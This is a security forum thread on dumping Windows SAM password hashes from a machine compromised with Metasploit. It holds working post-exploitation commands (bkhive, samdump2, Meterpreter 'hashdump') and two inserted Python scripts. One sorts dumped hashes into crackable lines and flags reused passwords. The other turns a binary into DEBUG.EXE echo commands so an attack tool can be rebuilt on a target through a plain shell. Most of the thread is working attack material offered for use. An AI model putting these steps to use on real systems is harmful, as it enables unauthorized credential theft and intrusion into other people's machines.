
Thread: Dump remote SAM from within metasploit?

  1. #1 Dissident85 (Member, joined Jun 2008, 127 posts)

    Dump remote SAM from within metasploit?

    Hi all, I was just wondering how I go about dumping the SAM on a remote computer that I have just exploited. For example, if I wanted to dump the SAM of a computer that I have physical access to from within BackTrack, I would do something like:

    Code:
    # bkhive /mnt/win/WINDOWS/system32/config/system key.txt

    Then

    Code:
    # samdump2 /mnt/win/WINDOWS/system32/config/sam key.txt

    So how would I do the same thing from a shell spawned from within Metasploit? How would I transfer over these programs? I remember reading somewhere that you can use "debug" in Windows to rebuild a program; I can't remember where I read that, but I know it is possible.

    I also know there is the samjuicer add-on for Meterpreter, but I am having enough trouble using Meterpreter as it is...

    Any help would be greatly appreciated.

  2. #2 Tully (Junior Member, joined Nov 2007, 37 posts)

    "Debugging" in Windows has nothing to do with this. You're trying to get the system file and the SAM file onto your box, or you could upload another program like pwdump2 to the box and then pwn the hashes off that way.

    http://www.ethicalhacker.net/compone...4/topic,533.0/

  3. #3 Dissident85 (Member, joined Jun 2008, 127 posts)

    Quote Originally Posted by Tully View Post
    "Debugging" in Windows has nothing to do with this. You're trying to get the system file and the SAM file onto your box, or you could upload another program like pwdump2 to the box and then pwn the hashes off that way.

    http://www.ethicalhacker.net/compone...4/topic,533.0/

    Yes, but there is a way to use debug to upload those programs... I have seen it done before, I just can't remember how.

    Also, that tute on Ethical Hacker uses "meterpreter". I haven't been able to get the Meterpreter payload working, but if I did it would be easier to use samjuicer.

  4. #4 hawaii67 (Member, joined Feb 2006, 318 posts)

    Use the meterpreter_reverse_tcp payload; this should work. The meterpreter_reverse_http payload is sometimes unstable.

    Then type:

    Code:
    meterpreter> use priv
    meterpreter> hashdump

    Don't eat yellow snow :rolleyes:
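    The hashdump command above (which needs SYSTEM privileges on the target, since it reads the hashes out of the SAM) prints one pwdump-style record per account, `username:RID:LM_hash:NT_hash:::`. The script below is an added example, not code from the thread or from Metasploit: it parses that output, flags the two constants worth recognising on sight (the LM field when no LM hash is stored, and the NT hash of an empty password), reports accounts that share an NT hash, and re-emits only the crackable records. The sample records are constructed for illustration; the `8846…` value is the well-known NT hash of "password".

```python
"""Triage Meterpreter `hashdump` output (added example, not from the thread)."""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# Constructed sample output; the accounts and values are illustrative, not from a real host.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
backup:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


def parse_hashdump(text):
    """Return a list of {user, rid, lm, nt} dicts; skip blank lines, reject malformed ones."""
    records = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        fields = line.split(":")
        if len(fields) < 4 or not fields[1].isdigit():
            raise ValueError(f"line {lineno}: not a pwdump record: {raw!r}")
        lm, nt = fields[2].lower(), fields[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            raise ValueError(f"line {lineno}: hash fields must be 32 hex characters")
        records.append({"user": fields[0], "rid": int(fields[1]), "lm": lm, "nt": nt})
    return records


def triage(records):
    """Flag what you check first after a dump: blank passwords, LM storage, password reuse."""
    findings = {"blank_password": [], "lm_hash_stored": [], "shared_nt_hash": {}}
    by_nt = defaultdict(list)
    for r in records:
        if r["nt"] == EMPTY_NT:
            findings["blank_password"].append(r["user"])
        if r["lm"] != EMPTY_LM:
            # An LM hash is present: LM storage is enabled, and LM is cheap to crack.
            findings["lm_hash_stored"].append(r["user"])
        by_nt[r["nt"]].append(r["user"])
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings["shared_nt_hash"][nt] = users   # same password on several accounts
    return findings


def crackable_lines(records):
    """Re-emit only accounts with a real password, in the pwdump format crackers expect."""
    return [f"{r['user']}:{r['rid']}:{r['lm']}:{r['nt']}:::"
            for r in records if r["nt"] != EMPTY_NT]


if __name__ == "__main__":
    recs = parse_hashdump(SAMPLE_HASHDUMP)
    for name, value in triage(recs).items():
        print(f"{name}: {value}")
    print("\n".join(crackable_lines(recs)))
```

    Feed it the pasted hashdump output instead of `SAMPLE_HASHDUMP`; the shared-hash check is the quick way to spot a local administrator password reused across hosts before any cracking starts.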

  5. #5 Dissident85 (Member, joined Jun 2008, 127 posts)

    Quote Originally Posted by hawaii67 View Post
    Use the meterpreter_reverse_tcp payload; this should work. The meterpreter_reverse_http payload is sometimes unstable.

    Then type:

    Code:
    meterpreter> use priv
    meterpreter> hashdump

    OK, I'll give that a go...

    Also, I did some more research and what I found was that using debug you can unassemble a program, then use debug to assemble it again, which allows you to send a program over a shell. I'm just having a little trouble finding out how you would pipe the output / send it back.

  6. #6 Junior Member (joined Nov 2007, 37 posts)

    If you can't get Meterpreter working, then just start an FTP service on your BT box, then FTP from the popped box: simple send/receive.

  7. #7 Member (joined Feb 2006, 167 posts)

    Quote Originally Posted by Dissident85 View Post
    OK, I'll give that a go...

    Also, I did some more research and what I found was that using debug you can unassemble a program, then use debug to assemble it again, which allows you to send a program over a shell. I'm just having a little trouble finding out how you would pipe the output / send it back.

    Yes, there's a way to convert binary to hexadecimal in a specific format, deliver it, and use Windows debug to convert it back to an executable. There's a 64 KB limit through Windows debug... There's a tool out there that my team wrote that gets past that; it's in fast-track. But if you want to convert something like samdump, you can use a tool in the windows-binary folder, it's called exe2hex or something like that; just do wine exe2hex <filename> and it will convert it to the format you need to echo into a text file and run debug to convert it.

    But for the purposes you're talking about, the above commands will dump the SAM for you.
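    To make the DEBUG route concrete, here is an added example written for this page; it is not exe2hex or the fast-track tool the post mentions, just the same idea in Python. DEBUG loads a file at offset 0100h of its working segment, so the script names the output file (`n`), enters the bytes (`e`), sets CX to the byte count (`rcx`), writes CX bytes from 0100h (`w`) and quits (`q`). Because CX is 16-bit and the data sits from 0100h to the end of one 64 KB segment, the script refuses anything over 0xFF00 bytes; that is the 64 KB limit the post refers to. The echo wrapper puts the `>>` redirection first so a hex digit at the end of a line is never mistaken by cmd.exe for a handle number. Caveat for anyone trying this today: debug.exe ships only with 32-bit Windows, so the technique does not apply to 64-bit targets. The sample blob and file names are constructed for the example.

```python
"""Build a DEBUG.EXE script that recreates a binary (added example, not the thread's exe2hex)."""
import re

LOAD_OFFSET = 0x100                     # DEBUG loads/writes data starting at CS:0100h
MAX_BYTES = 0x10000 - LOAD_OFFSET       # 0xFF00: what fits between 0100h and the end of the segment


def bin_to_debug_script(data, out_name, per_line=16):
    """Return the DEBUG script (CRLF line endings) that writes `data` to `out_name`."""
    if len(data) > MAX_BYTES:
        raise ValueError(f"{len(data)} bytes exceeds the {MAX_BYTES}-byte DEBUG limit")
    # 8.3 name, restricted to characters that are also safe inside a cmd.exe `echo`.
    if not re.fullmatch(r"[A-Za-z0-9_]{1,8}(\.[A-Za-z0-9]{1,3})?", out_name):
        raise ValueError("DEBUG needs an 8.3 file name")
    lines = [f"n {out_name}"]
    for off in range(0, len(data), per_line):
        chunk = data[off:off + per_line]
        lines.append(f"e {LOAD_OFFSET + off:04x} " + " ".join(f"{b:02x}" for b in chunk))
    lines += ["rcx", f"{len(data):x}", "w", "q"]   # `rcx` prompts, next line is the new CX value
    return "\r\n".join(lines) + "\r\n"


def script_to_echo_commands(script, script_name):
    """One cmd.exe command per script line, for typing or pasting down a plain shell."""
    # Redirection first: `echo ... 4d>>file` would be parsed as handle 4 redirection.
    cmds = [f">>{script_name} echo {line}" for line in script.splitlines()]
    cmds.append(f"debug<{script_name}")
    return cmds


def debug_script_to_bin(script):
    """Inverse: rebuild the bytes a DEBUG session running this script would write."""
    image = bytearray()
    length = None
    lines = script.splitlines()
    i = 0
    while i < len(lines):
        tok = lines[i].split()
        if tok and tok[0] == "e":
            addr = int(tok[1], 16) - LOAD_OFFSET
            payload = bytes(int(h, 16) for h in tok[2:])
            if len(image) < addr + len(payload):
                image.extend(b"\0" * (addr + len(payload) - len(image)))
            image[addr:addr + len(payload)] = payload
        elif tok and tok[0] == "rcx":
            length = int(lines[i + 1], 16)
            i += 1
        i += 1
    if length is None:
        raise ValueError("script never sets CX; DEBUG would write 0 bytes")
    return bytes(image[:length])


if __name__ == "__main__":
    blob = b"MZ" + bytes(range(256))          # constructed stand-in for a small tool
    script = bin_to_debug_script(blob, "tool.exe")
    print(script, end="")
    assert debug_script_to_bin(script) == blob
    print("\n".join(script_to_echo_commands(script, "t.txt")))
```

    Paste the echo commands into the remote shell, then `debug<t.txt` rebuilds the file; verify with `dir` that the size matches what `rcx` was set to, since a dropped line silently produces a shorter, corrupt binary.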
